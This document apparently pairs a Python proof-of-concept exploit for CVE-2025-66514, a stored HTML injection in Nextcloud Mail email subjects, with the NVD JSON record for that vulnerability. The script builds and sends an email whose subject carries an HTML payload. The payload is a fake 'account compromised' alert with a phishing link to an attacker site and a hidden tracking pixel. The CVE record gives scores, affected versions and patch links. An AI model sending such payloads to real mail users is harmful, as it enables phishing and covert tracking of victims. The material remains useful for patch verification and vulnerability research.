CVE-2025-66514

# CVE-2025-66514 PoC - Nextcloud Mail HTML Injection # This PoC demonstrates HTML injection in email subject import smtplib from email.mime.text import MIMEText from email.header import Header # Attacker-controlled SMTP server configuration attacker_smtp = 'attacker-smtp.example.com' attacker_email = '[email protected]' target_email = '[email protected]' # Malicious HTML payload injected into email subject # Note: JavaScript is blocked by Nextcloud CSP html_payload = ''' <div style="background:linear-gradient(to bottom, #f8f9fa, #e9ecef);padding:20px;border-radius:8px;box-shadow:0 2px 8px rgba(0,0,0,0.15);"> <h2 style="color:#d32f2f;margin-top:0;">⚠️ Security Alert</h2> <p>Your account has been compromised!</p> <p>Please <a href="http://attacker-evil-site.com/phishing">click here</a> to verify your identity.</p> <img src="http://attacker-tracking.com/track.gif" style="display:none;"> </div> ''' # Create email with malicious subject msg = MIMEText(html_payload, 'html', 'utf-8') msg['Subject'] = Header(html_payload, 'utf-8') msg['From'] = attacker_email msg['To'] = target_email try: # Send the malicious email with smtplib.SMTP(attacker_smtp) as server: server.send_message(msg) print('[+] Malicious email sent successfully') print('[+] When victim views email list, HTML will be rendered') except Exception as e: print(f'[-] Error: {e}')

{"cve": {"id": "CVE-2025-66514", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:57.457", "lastModified": "2025-12-09T19:23:19.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Mail is the mail app for Nextcloud, a self-hosted productivity platform. Prior to 5.5.3, a stored HTML injection in the Mail app's message list allowed an authenticated user to inject HTML into the email subjects. Javascript was correctly blocked by the content security policy of the Nextcloud Server code."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:mail:*:*:*:*:*:nextcloud:*:*", "versionEndExcluding": "5.5.3", "matchCriteriaId": "08B65EA3-F8F3-4B61-97BE-F593AE32C628"}]}]}], "references": [{"url": "https://github.com/nextcloud/mail/commit/c64fcc3b79e0c089b5e1d2e04a07bfa740b2ac09", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/mail/pull/11740", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-v394-8gpc-6fv5", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3357036", "source": "[email protected]", "tags": ["Permissions Required", "Vendor Advisory"]}]}}